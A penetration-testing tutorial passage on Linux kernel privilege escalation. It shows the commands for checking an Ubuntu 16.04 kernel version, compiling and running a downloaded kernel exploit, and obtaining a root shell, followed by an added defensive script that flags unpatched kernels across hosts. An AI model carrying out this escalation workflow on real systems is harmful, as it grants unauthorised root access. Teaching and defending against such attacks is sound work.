Kernel Exploits

Note: Kernel exploits can cause system instability, so use caution when running these against a production system.

Kernel Exploit Example

Let's start by checking the kernel level and Linux OS version.

Attacker@xxx[/xxx]$ uname -a

Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Attacker@xxx[/xxx]$ cat /etc/lsb-release 

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"

We can see that we are on Linux Kernel 4.4.0-116 on an Ubuntu 16.04.4 LTS box. A quick Google search for linux 4.4.0-116-generic exploit comes up with this exploit PoC. Next, download it to the system using wget or another file transfer method. We can compile the exploit code using gcc and set the executable bit using chmod +x.

Attacker@xxx[/xxx]$ gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit

Next, we run the exploit and hopefully get dropped into a root shell.

Attacker@xxx[/xxx]$ ./kernel_exploit 

task_struct = ffff8800b71d7000
uidptr = ffff8800b95ce544
spawning root shell

Finally, we can confirm root access to the box.

root@xxx[/xxx]# whoami

root
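
The version check that opens this walkthrough is also the cheapest control on the defending side: an inventory job can flag every host whose running kernel is older than the build the distribution's security notice lists as fixed. The script below is an added example, not part of the original page. The function names, the hosts other than NIX02 and the baseline value are constructed for illustration, and the baseline must be replaced with the fixed version from the vendor advisory.

```shell
#!/bin/sh
# Added example: flag hosts whose running kernel is older than a patched baseline.
# Release strings follow the Ubuntu form shown above: <upstream>-<abi>-<flavour>,
# for example 4.4.0-116-generic. Requires a sort that supports -V (GNU coreutils).

# Constructed placeholder, NOT a real fixed version: take it from the vendor advisory.
BASELINE="${BASELINE:-4.4.0-200-generic}"

# Strip the flavour suffix, leaving "<upstream>-<abi>" (4.4.0-116).
kernel_core() {
    printf '%s\n' "$1" | sed -E 's/^([0-9]+(\.[0-9]+)*(-[0-9]+)?).*$/\1/'
}

# Return 0 (true) when release $1 is strictly older than baseline $2.
kernel_below_baseline() {
    running=$(kernel_core "$1")
    baseline=$(kernel_core "$2")
    if [ "$running" = "$baseline" ]; then
        return 1
    fi
    # Version sort puts the older release first: 4.4.0-21 < 4.4.0-116 < 4.15.0-20.
    oldest=$(printf '%s\n%s\n' "$running" "$baseline" | sort -V | head -n 1)
    [ "$oldest" = "$running" ]
}

# Read "<host> <uname -r output>" lines on stdin; print the ones below baseline $1.
flag_hosts() {
    min=$1
    while read -r host release; do
        if kernel_below_baseline "$release" "$min"; then
            printf '%s %s\n' "$host" "$release"
        fi
    done
}

# Constructed inventory: NIX02 is the box from the walkthrough, the rest are made up.
flag_hosts "$BASELINE" <<'EOF'
NIX02 4.4.0-116-generic
db01 4.4.0-210-generic
build01 4.15.0-20-generic
EOF
```

In practice the inventory lines would come from running `uname -r` on each host through existing configuration management. A host that has installed the fixed package but not rebooted still reports the old release, which is exactly what this check should catch.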